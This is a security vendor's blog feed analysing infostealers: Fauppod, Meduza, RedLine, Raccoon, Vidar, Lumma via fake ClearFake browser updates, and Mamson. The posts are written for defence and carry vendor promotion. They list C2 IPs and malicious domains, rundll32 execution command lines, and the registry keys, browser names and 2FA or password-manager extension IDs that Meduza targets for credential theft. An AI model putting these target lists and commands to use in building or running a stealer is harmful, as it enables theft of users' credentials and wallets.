Stealer Archives – Gridinsoft Blog Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Mon, 16 Sep 2024 22:59:36 +0000 en-US hourly 1 https://wordpress.org/?v=79842 200474804 Trojan:Win32/Fauppod!ml https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/ https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/#respond Thu, 12 Sep 2024 15:25:21 +0000 https://gridinsoft.com/blogs/?p=26999 Trojan:Win32/Fauppod!ml is a detection that is based on machine learning and is assigned to an unspecified threat type. Usually such threats are identified by behavior rather than signatures. Nonetheless, this exact malware detection poses a serious hazard, as it appears to flag the activity of a targeted infostealer trojan. Trojan:Win32/Fauppod!ml Overview Trojan:Win32/Fauppod!ml is a generic… Continue reading Trojan:Win32/Fauppod!ml

The post Trojan:Win32/Fauppod!ml appeared first on Gridinsoft Blog.

]]>
Trojan:Win32/Fauppod!ml is a detection that is based on machine learning and is assigned to an unspecified threat type. Usually such threats are identified by behavior rather than signatures. Nonetheless, this exact malware detection poses a serious hazard, as it appears to flag the activity of a targeted infostealer trojan.

Trojan:Win32/Fauppod!ml Overview

Trojan:Win32/Fauppod!ml is a generic detection name that Microsoft Defender assigns to malware detected by its AI detection system. Typically, this detection points at the activity of an infostealer that primarily targets banking data. The “ml” in the detection name exactly indicates the use of a machine learning system, rather than traditional signature-based detection methods. Usually, over time, as more information about its behavior is analyzed, this detection gets a more specific detection name.

Trojan:Win32/Fauppod!ml detection window screenshot
Trojan:Win32/Fauppod!ml detection window

As mentioned at the beginning, the main goal of Fauppod is to steal the credentials of online accounts. One thing it goes for in particular is login credentials for online banking accounts.

Main spreading ways of this malware are malicious email attachments (attached Word or Excel files) in emails, or via sketchy game mods or other files from sketchy sources. Despite targeting specifically banking information, it is not picky about its victims, stealing info from all categories of users.

Fauppod Analysis

Let’s take a closer look at the technical part of how Fauppod!ml behaves on the system. The first thing the malware does after launching is to check if it is the only copy of malware running on the device. It achieves this by creating and accessing mutexes:

\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex.
\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex.

Since our example is a DLL file, it needs a legitimate Rundll32.exe process to run. The malware copies the legitimate Rundll32.exe file to the temporary folder C:\Users\User\AppData\Local\Temp\rundll32.exe and utilizing process hijacking techniques.

Next, the malware checks the UAC status and the presence of anti-malware on the system. It checks these registry keys to disable system defenses and ensure persistence:

HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Security
HKEY_CURRENT_USER\Software\Microsoft/Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft/Windows\CurrentVersion\Uninstall

Fauppod Execution

The malware executes shell commands that allow it to perform its main function:

C:\Users\User\AppData\Local\Temp\rundll32.exe rpl909.zip.dll
“C:\Windows\System32\rundll32.exe” C:\Users\A4148~1.MON\AppData\Local\Temp\b81d42902b581dd9fea37c4b6a8ff180.19772.dll,DllMain

After that, the malware deploys payloads and injects itself into legitimate processes, allowing it to function without raising suspicions from security software. It also manipulates processes such as wmiadap.exe, svchost.exe and cmd.exe, which are legitimate processes. The malware executes the following processes:

wmiadap.exe /F /T /R
%windir%\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
%windir%\system32\wbem\wmiprvse.exe.
%windir%\System32\svchost.exe -k WerSvcGroup
13f43b565119f43f7155f96cafa8b05d.exe
C:Windows/System32 loaddll32.exe loaddll32.exe “C:\Users\user\Desktop\init.dll”.
C:Windows / Windows / SysWOW64 / cmd.exe cmd.exe /C rundll32.exe “C:\Users / User / Desktop /init.dll”,#1.
C:Windows/sysWOW64/rundll32.exe rundll32.exe “C:\Users/User/Desktop/init.dll”,#1.
C:\Windows/SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_Clockcould@8.
C:\Windows/SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_DllRegisterServer@0
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\User\Desktop\init.dll,_Representfinish@4.

So, we can conclude that the malware is also abusing the svchost.exe process in WerSvcGroup, which is related to the Windows Error Reporting Service. This is a common practice of malware that uses this process to mask its actions by injecting code into system services. The 13f43b565119f43f7155f96cafa8b05d.exe executable also appears to be part of the payload.

Fauppod Connections

The malware uses both standard addresses and ports as well as non-standard ones. Among the standard ones:

GET watson.microsoft.comhttp://watson.microsoft.com/StageOne/rundll32_exe/6_1_7600_16385/4a5bc637/StackHash_1abe/0_0_0_0/00000000/c0000005/fd8b3a80.htm?LCID=1040&OS=6.1.7601.2.00010100.1.0.48.17514&SM=LENOVO&SPN=64755N2&BV=7UET92WW%20(3.22%20)&MID=F2EC8DC6-EB4A-4B44-95EF-9B81DC7C287B

Using standard ports that belong to Microsoft allows you to hide your actions. On the other hand, using suspicious addresses and non-standard ports indicates communication with the C2 server. In our case, these addresses are:

97.107.127.161:443
45.33.94.33:5037
159.89.91.92:5037
158.69.118.130:1443

Some of the IP addresses in the list (and quite a few others that I’ve excluded for the sake of readability) correspond to compromised websites. This is a oftenly used tactic: attackers use a hacked website as an intermediary command server, while the request looks legitimate for anyone who tries to find the traces.

Is Trojan:Win32/Fauppod!ml False Detection?

As I have mentioned several times already, Trojan:Win32/Fauppod!ml is a heuristic detection based on machine learning. This means it can sometimes result in false positives. That is, Heuristic methods analyze file patterns, behaviors, and structural elements rather than relying on pre-defined signatures. As a result, legitimate software with uncommon characteristics or behaviors may be flagged as suspicious. In such cases, after some time, the anti-malware software stops flagging the file as a threat.

How to Remove Trojan Fauppod?

If you encounter Trojan:Win32/Fauppod!ml and are unsure whether it’s a false detection or a real threat, an effective solution is to use a third-party anti-malware solution. GridinSoft Anti-Malware would be a great option that can both confirm the threat and disprove it. Use the instructions below to scan your device for threats.

Trojan:Win32/Fauppod!ml

The post Trojan:Win32/Fauppod!ml appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/feed/ 0 26999
Meduza Stealer https://gridinsoft.com/blogs/meduza-stealer-analysis/ https://gridinsoft.com/blogs/meduza-stealer-analysis/#respond Wed, 19 Jun 2024 14:20:31 +0000 https://gridinsoft.com/blogs/?p=16088 The Malware world evolves constantly, and it would be reckless to ignore newcomers and their potential. Meduza Stealer appears to be a pretty potent stealer variant with its unique features and marketing model. Additionally, this malware may be considered a firstling of a new malware generation – one which breaks old geolocation filtering rules. What… Continue reading Meduza Stealer

The post Meduza Stealer appeared first on Gridinsoft Blog.

]]>
The Malware world evolves constantly, and it would be reckless to ignore newcomers and their potential. Meduza Stealer appears to be a pretty potent stealer variant with its unique features and marketing model. Additionally, this malware may be considered a firstling of a new malware generation – one which breaks old geolocation filtering rules.

What is Meduza Stealer?

Meduza is an all-encompassing infostealer, which is somewhat similar to the old guard at a glance. However, well-known things such as Redline or Raccoon stealers gained the ability to steal cryptocurrency information only with further updates. Meduza, on the other hand, can do this out-of-box, with the ability to circumvent more tricky protection measures of crypto apps. Moreover, it includes a much bigger list of wallets and browsers it can extract data from than any of the mentioned stealers.

The distinctive feature of Meduza Stealer is the way it hides its samples. Instead of a usual packing, hackers use code obfuscation and recompiling, which allows them to circumvent even the most robust anti-malware engines. Well, these approaches do not sound like something phenomenal, but when applied together, and in an unusual way, things may become way less predictable – and detectable.

Though, this is not the full list of unusual things for this malware. In price, the malware offers 2 fixed plans and a negotiable lifetime license. For $199 you receive malware, all possible customization options for the payload, admin panel, and the ability to download all the logs in one click, for the term of 1 month. Hackers offer the same stuff for $399 for 3 months. And the cherry topping, as I said, is the ability to negotiate the prices of a lifetime license for this malware. Probably, malware developers are even ready to share the source code – but that is only a guess since there were groups that used such a model earlier.

Meduza Stealer in Telegram
Promotion of Meduza Stealer in Telegram. Channels are exclusively Russian.

An Offspring of Aurora Stealer?

There are plenty of examples of how brand-new malware may be a re-branded old sample, with a slightly different team of crooks behind it. Malware is rarely developed by a single person. Developers of one malware may start working on another, and bring their prior developments in a new product. Alternatively, a part of a cybercrime gang that stopped functioning may decide to resume their illegal deeds – and they rebrand their “tools” to start with a new image. This or another way, is a common occasion there.

In the case of Meduza Stealer, things are not that straightforward. Due to the use of enhanced obfuscation, it is hard to say whether it shares any code details with known malware families. Some malware analysts claim that Meduza is an offspring of Aurora Stealer – malware that popped out in late 2022. Their main arguments are similarity in the form of C2 calls and logs with collected data.

Aurora vs Meduza Logs
Similarity in logs of Aurora and Meduza Stealers

As you can see, Meduza’s logs resemble Aurora’s by the ASCII-styled header and some visual elements. However, it is not a definitive thing – malware developers sometimes inspire with or completely copy things from other malware families. Other details that researchers put under the suspect are file naming policies – but this is not the brightest proof as well.

This, however, caused a harsh reaction from malware developers. In their “support” channel they called all the proofs rubbish, and also said they picked up the trail of one who leaked the malware build. Also, there was decent evidence that proves Meduza’s originality – it is written in C++, which is not even close to the Golang used in Aurora Stealer.

Developers Rant
The reaction of Meduza developer to the analyst’s claims about the malware being Aurora stealer copy

Meduza Stealer Analysis: Catch Me or I Catch You

The threat that comes from each specific malware sample roughly depends on two factors: how hard it is to detect it and how much damage it can deal. Meduza Stealer tries to outpace its counterparts in these two factors. It is not the most stealthy malware, for sure, and there are ones that steal even more data, but rare samples may boast of a combination of these two. And Meduza does.

Meduza Stealer Exec Chain

In the picture above you can see the simplified scheme of the Meduza Stealer operation process. First of all, it checks the geolocation of the attacked system by its IP address. There lies another unusual feature of this malware — it has a typical ban list of countries for malware from Russia, though it does not include Ukraine. Instead, malware will exit once the IP of the attacked system is in Georgia. The latter has become quite a popular destination among Russians who try to avoid enlistment in the army. Overall, malware will not run in Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Turkmenistan.

Excluded Countries
Code in the malware’s PE file that bans its execution in certain countries.

The very next step is contacting the C2 server. This step is not very common among stealers, as they prefer to knock back the C2 only after succeeding with data stealing. Instead, Meduza contacts the server immediately after ensuring that the system is not in the forbidden location – but without any strict actions. Malware sends the blank POST request, that does not receive any response from the server. Only once the connection is successful, malware will keep going.

Data Gathering

As I said, Meduza is distinctive for an outrageously wide number of web browsers, desktop apps, and crypto-wallets it can rummage through. More common malware samples usually stop on the most popular apps and wallets, including some from alternative options. This one, however, does not disdain even underdogs. Kinza, Mail.ru, Atom, Amigo – some of them are even considered PUPs by security vendors, and I bet you didn’t even know that some of them exist.

List of browsers Meduza gathers data from:

Chrome Chrome Beta Chrome SxS 360ChromeX ChromePlus
Chromium Edge Brave Browser Epic Privacy Browser Amigo
Vivaldi Kometa Orbitum Atom Comodo Dragon
Torch Comodo Slimjet 360Browser 360se6
Baidu Spark Falkon AVAST Browser Waterfox BitTubeBrowser
NetboxBrowser Mustang InsomniacBrowser Maxthon Viasat Browser
Opera Stable Opera Neon Opera Crypto Developer Opera GX Stable QQBrowser
SLBrowser K-Meleon Go! Secure Browser Sputnik
Nichrome CocCoc Browser Uran Chromodo YandexBrowser
7Star Chedot CentBrowser Iridium Naver Whale
Titan Browser SeaMonkey UCBrowser CLIQZ Flock
BlackHawk Sidekick Basilisk GhostBrowser GarenaPlus
URBrowser IceDragon CryptoTab Browser Pale Moon Superbird
Elements Browser Citrio Xpom ChromiumViewer QIP Surf
Liebao Coowon Suhba TorBro RockMelt
Bromium Kinza CCleaner Browser AcWebBrowserr CoolNovo
SRWare Iron Mozilla Firefox AVG Browser Thunderbird Blisk
Cyberfonx SwingBrowser Mozilla IceCat SalamWeb SlimBrowser

Browsers commonly have different ways to handle passwords and autofill info – and the malware has its approach for each one. For ones that store such data in databases, malware prepares an SQL database request, which simply extracts all the valuables. Other, less secure browsers, keep this info in a plain text file – which is not a big quest to find.

One more point of interest for stealer malware in web browsers is cookie files. Cookies can contain different things – from almost useless shopping cart contents to session tokens, usernames, emails, and the like. Cookie files can have a great value when it comes to data stealing – especially when they are fresh. One may say – just the like real ones.

Desktop apps

Aside from web browsers, Meduza Stealer gathers information from several desktop applications, namely Telegram, Steam, and different Discord clients. To put its hands on Steam session tokens, malware gets to the program’s registry key in the CurrentUser branch. The HKCU\Software\Valve\Steam key contains a lot of info, aside from login data and session information – so malware does not go purely for the account.

Telegram does not keep login details in such an accessible form, though malware manages to gather sensitive information similarly. By checking these two keys, Meduza can get information about the system kept in Telegram session info, app versions, usernames, and other important stuff.


HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4A4AE8F-B9F7-4CC7-8A6C-BF7EEE87ACA5}_is1

Discord is also a tough nut when it comes to grabbing session info. For that reason, malware limits to only system info recorded in a session, app configurations, and the like. This, contrary to two other apps, is done directly in the programs’ folder. Malware attacks several different editions of Discord, as the free API allows the creating of forks and user modifications.

2FA Extensions

Well, did I say that Meduza is ravenous when it comes to data gathering? Hold your 2FA browser extensions close to your body – the malware hunts them as well. The list of add-ons it targets is not as big as that of browsers, though there are not many of them present.

Extension name Web Store ID
Authenticator 2FA bhghoamapcdpbohphigoooaddinpkbai
Authenticator 2FA ocglkepbibnalbgmbachknglpdipeoio
EOS Authenticator oeljdldpnmdbchonielidgobddffflal
Trezor Password Manager imloifkgjagghnncjkhggdhalmcnfklk
GAuth Authenticator ilgcnhelpchnceeipipijaljkblbcobl
1Password oeljdldpnmdbchonielidgobddffflal
1Password dppgmdbiimibapkepcbdbmkaabgiofem
Dashlane Password Manager fdjamakpfbbddfjaooikfcpapjohcfmg
Dashlane Password Manager gehmmocbbkpblljhkekmfhjpfbkclbph
Bitwarden Password Manager nngceckbapebfimnlniiiahkandclblb
Bitwarden Password Manager jbkfoedolllekgbhcbcoahefnbanhhlh
NordPass jbkfoedolllekgbhcbcoahefnbanhhlh
Keeper Password Manager bfogiafebfohielmmehodmfbbebbbpei
RoboForm pnlccmojcmeohlpggmfnbbiapkmbliob
RoboForm ljfpcifpgbbchoddpjefaipoiigpdmag
SSO Authenticator nhhldecdfagpbfggphklkaeiocfnaafm
Zoho Vault igkpcodhieompeloncfnbekccinhapdb
KeePassXC dppgmdbiimibapkepcbdbmkaabgiofem
KeePassXC pdffhmdngciaglkoonimfcmckehcpafo
LastPass hdokiejnpimakedhajhdlcegeplioahd
LastPass bbcinlkgjjkejfdpemiealijmmooekmp
BrowserPass naepdomgkenhinolocfifgehidddafch
MYKI bmikpgodpkclnkgmnpphehdgcimmided
MYKI nofkfblpeailgignhkbnapbephdnmbmn
Splikity jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey chgfefjpcobfbnpmiokfjjaglahmnded
Authy gaedmjdfmmahhbjefcbgaolhhanlaolb

Cryptocurrency wallets

Gathering data about crypto wallets was not a widespread thing among older-gen stealers. With time, most of the families we know and love adopted such functionality. Modern-gen ones have them present by default, and it probably makes up for the number of names they can gather info from.

MetaMask Binance Wallet BitApp Wallet Coin98 Wallet
SafePal Wallet DAppPlay Guarda EQUA Wallet
GuildWallet Casper Wallet ICONex Math Wallet
Starcoin Hiro Wallet MetaWallet Swash
Finnie Keplr Crocobit Wallet Oxygen
MOBOX WALLET Phantom TronLink XDCPay
Ton Sollet Slope DuinoCoin Wallet
LeafWallet Brave Wallet Opera Wallet CWallet
Flint Wallet Exodus Web3 Wallet Trust Wallet Crypto Airdrops & Bounties
Nifty Wallet Liquality Ronin Wallet Oasis
Temple Pontem Aptos Wallet Solflare Wallet Yoroi
iWallet Wombat Gaming Wallet Coinbase Wallet MEW CX
Jaxx Liberty OneKey Hycon Lite Client SubWallet
Goby TezBox ONTO Wallet Hashpack
Cyano Martian Wallet Sender Wallet Zecrey
Auro Terra Station KardiaChain Rabby Wallet
NeoLine Nabox XDEFI KHC
OneKey CLW Polymesh ZilPay
Byone Eternl Nami Maiar DeFi Wallet

This extensive list contains crypto wallets that can have both desktop and in-browser forms. In such cases, malware treats them in a separate way – by collecting data from registry entries they leave. Here are some examples of keys the malware can read to collect login data from your crypto wallet:


HKCU\SOFTWARE\Etherdyne\Etherwall\geth
HKCU\SOFTWARE\monero-project\monero-core
HKCU\SOFTWARE\BitcoinCore\BitcoinCore-Qt
HKCU\SOFTWARE\LitecoinCore\LitecoinCore-Qt
HKCU\SOFTWARE\DashCore\DashCore-Qt
HKCU\SOFTWARE\DogecoinCore\DogecoinCore-Qt

System fingerprinting

To distinguish between the attacked systems, stealers commonly collect some trivial info about the system. Meduza is not an exclusion – it collects all the basic things that can identify the computer among others.

  • System build details
  • Username
  • Computer name
  • Screen Resolution details
  • Screenshot
  • OS details
  • CPU details
  • RAM details
  • GPU
  • Hardware ID details
  • Execute path
  • Public Ip
  • Geo
  • Time
  • TimeZone

Another application for such data comes into view when we remember that Meduza can also collect browser cookies. The combination of cookies, passwords, and system information allows for creating a complete copy of the device – at least from the POV of the website. There even were Darknet services dedicated specifically to the system profile spoofing – you input the cookies and system specs, and it makes your system indistinguishable from the original one. This helps with circumventing the most sophisticated protection mechanisms.

Data extraction

All the data Meduza Stealer manages to collect from the infected system is stored in a specific folder, created after the malware unpacking and execution. When it comes to sending the data to the command server, malware archives this data and sends it to the server – nothing unusual there. Since malware uses a protected connection for the C&C communication, it is not that easy to detect the extraction process.

C&C connection Meduza
Code responsible for the C2 server connection in Meduza Stealer.

Contrary to the “classic” stealers, like Vidar, Meduza does not perform the meltdown once it finishes data collection. It keeps running in the background, performing periodic pings to the C2 and waiting for commands. There is a command for self-removal – but they are most likely sent only in exclusive cases.

How to protect against Meduza Stealer?

Actually, the ways to protect against Meduza are the same as in the case of any other stealers. However, there is a difference dictated by the exceptional detection evasion capabilities of this malware. For efficient prevention of Meduza stealer activity, a strong heuristic protection is essential.

Be careful with all things that can act as a malware source. Email spam or phishing posts in social media are among the most exploited ways of malware spreading. A less popular, but sometimes even more efficient approach is exploiting Google Ads in search results. Fraudsters will do their best to make you believe that the thing is legit, and you should not fear interacting with it.

Implement preventive anti-malware measures. To weed out malware with such an unusual detection evasion model the program should include a sturdy heuristic engine. Additionally, you can seek solutions with email protection functions and CDR applications. They help you to secure one of the possible attack vectors.

Avoid cracked software. Yet another place used for malware spreading is cracked programs – they have served this purpose for over two decades now. And even since its share shrunk in recent years, you can still get something nasty from there. You can get dropper malware through the program crack, and it will then inject any other thing – from spyware to ransomware.

Meduza Stealer Removal

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Meduza Stealer appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/meduza-stealer-analysis/feed/ 0 16088
What is Infostealer Malware? Top 5 Stealers in 2024 https://gridinsoft.com/blogs/infostealer-malware-top/ https://gridinsoft.com/blogs/infostealer-malware-top/#respond Wed, 19 Jun 2024 13:16:29 +0000 https://gridinsoft.com/blogs/?p=14520 The Cybercrime world changes rapidly – both by expanding, collapsing, and evolving extensively and intensively. One of the most massive malware types in the modern threat landscape – Infostealer Malware – appears to enter a new stage of development. Though its major names remain the same, some new malware families with promising features popped out.… Continue reading What is Infostealer Malware? Top 5 Stealers in 2024

The post What is Infostealer Malware? Top 5 Stealers in 2024 appeared first on Gridinsoft Blog.

]]>
The Cybercrime world changes rapidly – both by expanding, collapsing, and evolving extensively and intensively. One of the most massive malware types in the modern threat landscape – Infostealer Malware – appears to enter a new stage of development. Though its major names remain the same, some new malware families with promising features popped out. Let’s have a peek at all of them and see what to expect.

Infostealer Malware Market in 2024

Infostealer malware gained more and more popularity during the last decade. However, the biggest spike happened during the last few years. The first noticeable factor is the massive popularisation of cryptocurrencies. How is that related? Well, relatively big amounts of money always attracted the attention of hackers. Carding and banking fraud though is now less effective as banks implemented strict controlling measures back in the early ‘10s. Cryptocurrency wallets, on the other hand, have low to no control, making them ideal targets for Infostealer.

Infostealer Malware stats

Another reason that made spyware and infostealers so popular and widespread is their massive application in attacks on corporations. Even when hackers break into the network to cipher the files and ask for a ransom for their decryption, they also drop an Infostealer malware that will exfiltrate as much valuable information as possible. Afterwards, hackers request an additional ransom to keep this data secret. Some attacks are based exclusively on stealers, and the result of their job is both sold on the Darknet or used for business email compromise (BEC) attacks. Additionally, some ransomware groups that aim at home users started adding spyware to their attack chain a while ago.

Infostealer Malware Market Leaders

As of May 2024, 3 major malware families dominate the market – RedLine, Raccoon, and Vidar. All of them are not new at that point of time, with Vidar being active for the longest time. Let’s have a closer look at them, starting with the youngest one.

RedLine Infostealer

RedLine infostealer appeared in 2020, and saw a pretty wide application in different cyberattacks. Most of the time, however, it was aimed against single users, as its functionality fits best for this purpose. Key targets for the RedLine are cryptocurrency wallet data, both from desktop versions and browser plugins. Still, it can gather other data, like FTP/VPN configurations and session tokens for apps like Discord or Steam. Having a pretty large market share at the edge of 2024, it became much less active starting from March 2024. Yet an enormous number of new samples that popped out recently may be the sign of another campaign getting ready. The RedLine developers find hackers who buy this malware is through Telegram groups and Darknet forums.

Redline promotion in Telegram
Telegram group post that advertises Redline malware

Raccoon Infostealer

Raccoon has key properties similar to ones RedLine offers, but is capable of capturing a much wider selection of data. In its scope are browser autofill files, cookies, and online banking credentials, on top of the ability to pluck cryptocurrency wallets. Since the emergence in early 2019, Raccoon was holding dominant positions on the market – and keeps holding them even now. In the summer 2022, its developers released a new version, promising faster and more reliable malware for a slightly bigger pay. Same as RedLine, Raccoon stealer is commonly spread through ads in Telegram channels and bots; Darknet platforms are less preferred, though are used for public communication.

Raccoon stealer admin panel
Admin panel of Raccoon stealer

Vidar Infostealer

Among top 3 Infostealer threats, Vidar is most definitely a dark horse. It is considered to be an offspring of Arkei stealer, malware that made quite an image back in early 10’s. After the launch in 2018, it never had a dominant share on the market, being at best #2. Nonetheless, its efficiency and unique design is hard to deny – Vidar offers a modular approach towards data stealing and has an uncommon way of C2 communication. It also performs self-destruction after the successful data exfiltration. Additionally, it is often spread in a bundle with other malware, such as STOP/Djvu ransomware. Methods of selling it to cybercriminals, however, are less unique – it uses Telegram channels dedicated to malware promotion.

Newbies

It would be quite reckless to deny the importance of new malware. For sure, not all of them will make it even to the 1-year milestone, but Raccoon and Vidar once were newbies as well – and you can see where they are. Among stealer families that popped out over the last year, there are a couple you should keep in mind.

Lumma

Also known as LummaC2, this infostealer appeared in December 2022. At the outset of familiarity with this malware, you can already see some fairly noteworthy details. At the “pricing plans” panel, developers mention the ability to configure the payload in a specific manner, and add network sniffer functionality. The presence of these functions depends on the price of the chosen plan – $250, $500 or $1,000. Additionally, masters offer access to malware and panel source codes and the right to sell them – for $20,000. Other functions, however, are available regardless of the plan. Lumma can grab browser cookies, autofill forms, data from 2FA plugins/apps, and crypto wallets credentials – from both apps and browser plugins.

Lumma infostealer pricing
Pricings for different LummaC2 stealer plans, posted on the Darknet website

Stealc

Stealc is another youngster, which was first mentioned on January 9, 2023, on several Darknet forums. It appears to utilise best practices from most popular stealers, which already makes it pretty potent. Among unusual practices is a free test and weekly releases of new features. As for other functions, malware has a classic set of a modern infostealer: it gathers data from web browsers (cookies, autofill forms etc), cryptocurrency wallets extensions and even email clients and messengers. Such extended functionality, especially compared to other new malware examples, will definitely be appreciated.

How to Protect Against Infostealer Malware?

Protection against threats like infostealer is always a tough question to answer. Thing is, malware like this is forced to evolve constantly, finding new ways to be more efficient and stealthy. This makes any advice that reacts to some malware features useless in the long-term. However, there are still some things Infostealer Malware developers can’t (or don’t want to) change.

Beware of spear phishing. It may have different forms – from email messages that are sent from a compromised business email to posts in social media from the hijacked account of a legit company. But even after all the sophistications, hackers can never make a check-proof legend. Most commonly, they attract victims by urgent events or exclusive deals. A simple source check will reveal any possible scam – if the impersonated company has nothing to do with such claims, ignore the spooking message.

Avoid using pirated software. Despite losing a significant portion of market share due to email spam expansion, software cracks are still used for malware spreading. Torrent-trackers and third party websites are flooded with numerous offers on a brand new software – and try to guess which one is infected. Using only licensed software will not make you clear before the law, but also nail any risk of malware injection. And, believe me – dealing with malware activity consequences will cost you way more than you can save on program licences.

Protect your system with proper anti-malware software. Yes, it is better to avoid muddy waters at all, but having a security tool that will take care of problems will make your life much easier. Not any utility will fit though, as infostealer malware have some tricks to avoid basic anti-malware software. GridinSoft Anti-Malware gives them no chances, thanks to its three-component detection system and constant updates that retain its databases’ relevance.

What is Infostealer Malware? Top 5 Stealers in 2024

The post What is Infostealer Malware? Top 5 Stealers in 2024 appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/infostealer-malware-top/feed/ 0 14520
Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/ https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/#respond Mon, 17 Jun 2024 15:16:22 +0000 https://gridinsoft.com/blogs/?p=22855 Recent research uncovered a selection of websites that deploy Lumma Stealer under the guise of a browser update. They pose as tutorial pages that offer seemingly correct guides, but then open a malicious JS iframe handled with ClearFake framework. Some of these sites are active for several weeks now. Fake Tutorial Sites Spread Lumma Stealer… Continue reading Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake

The post Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake appeared first on Gridinsoft Blog.

]]>
Recent research uncovered a selection of websites that deploy Lumma Stealer under the guise of a browser update. They pose as tutorial pages that offer seemingly correct guides, but then open a malicious JS iframe handled with ClearFake framework. Some of these sites are active for several weeks now.

Fake Tutorial Sites Spread Lumma Stealer with ClearFake Framework

A new spreading campaign of Lumma Stealer apparently started on fake tutorial sites. Avast reports about one specific example of such a page, that uses a JS framework known as ClearFake to trick the user into running a payload. The base website, pchelperspro[.]com appears as just a page that instructs on solving an issue with Windows update, with the rest of the attack happening after spending a bit more time. Though, an attentive user will notice that the all buttons on the page are inactive, and they in fact are from a different site.

Fake tutorial website
Looks like just a regular website with a tutorial, but there’s a catch

After a short timeout, the aforementioned framework kicks in, opening the fake browser update window. The way it functions, as well as the design of the fake update page, makes it particularly hard to think of it as something malicious. If, of course, you are not aware that web browsers never show such windows to begin with. Following the guidance from the fake update window makes the user download and run the malicious PowerShell script.

The PS script, in turn, connects to the command server, loads the final payload (Lumma Stealer) and executes it. Interestingly enough, the script also performs a chain of actions targeted on system fingerprinting. In particular, it performs the following queries:

C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\SecurityHealthService.exe

Addresses of command servers are encoded into the script text, and initially appear as some sketchy online shops. However, every single one was created just 20 days ago – barely a coincidence.

Standingcomperewhitwo.shop
Innerverdanytiresw.shop
Lamentablegapingkwaq.shop
Sturdyregularrmsnhw.shop
Stickyyummyskiwffe.shop
Greentastellesqwm.shop

ClearFake and Lumma Stealer Short Overview

ClearFake is a name for a JavaScript framework, that allows creating JS iframes with any needed content, circumnavigating web browser’s protective mechanisms. Originally spotted in August 2023, it was massively used in attack campaigns similar to what I’ve described above. Same as in the current campaign, it was used to display an “update your browser” page, with some additional customization depending on the browser that the victim is using. The only difference now is the use of day-timer websites instead of compromised pages, like in the original campaign.

Fake update website ClearFake
Appearance of a fake browser update page, built on a ClearFake framework

Lumma Stealer, on the other hand, is a much more recognizable malicious program. Appeared just a year ago, in early 2023, it gained significant popularity and fame on the Darknet. Built around the principle of the least footprint, it is capable of avoiding detection from antiviruses that orient at typical activities of spyware. Combined with flexible spreading ways (YouTube promos of cracked software, spam in Discord), this pushed Lumma to its current popularity. From the perspective of functionality, it is a modular infostealer that collects passwords, session tokens, cryptowallet data, and so on.

Protect Your Network Browsing & PC Activities

Using GridinSoft Anti-Malware, you will be able to avoid shady sites and malicious frameworks before they can harm you. Its network security module will analyze the activities with multiple detection systems. Continuous database updates allow the program to have peak efficiency even against the most recent network threats. Try it out now!

Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake

The post Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/feed/ 0 22855
Trojan:Win32/Mamson.A!ac https://gridinsoft.com/blogs/trojan-win32-mamson-aac/ https://gridinsoft.com/blogs/trojan-win32-mamson-aac/#respond Wed, 29 May 2024 14:34:04 +0000 https://gridinsoft.com/blogs/?p=21964 Trojan:Win32/Mamson.A!ac is a type of malware designed to gather data from the system it infects. Sometimes, known spyware families get this detection. The malware is typically distributed disguised as helpful utilities that are downloaded from untrustworthy sources. Trojan:Win32/Mamson.A!ac Overview Trojan:Win32/Mamson.A!ac is a Microsoft Defender detection that flags infostealer malware. This type of malicious program aims… Continue reading Trojan:Win32/Mamson.A!ac

The post Trojan:Win32/Mamson.A!ac appeared first on Gridinsoft Blog.

]]>
Trojan:Win32/Mamson.A!ac is a type of malware designed to gather data from the system it infects. Sometimes, known spyware families get this detection. The malware is typically distributed disguised as helpful utilities that are downloaded from untrustworthy sources.

Trojan:Win32/Mamson.A!ac Overview

Trojan:Win32/Mamson.A!ac is a Microsoft Defender detection that flags infostealer malware. This type of malicious program aims at collecting data from the infected system. Usually, it gathers login credentials from browser files, cookies, browser history, and other information about the victim’s Internet activity. In some cases, samples of RedLine Stealer appear under this detection. Still, the effect is exactly the same.

Trojan:Win32/Mamson.A!ac Detection
Trojan:Win32/Mamson.A!ac detection

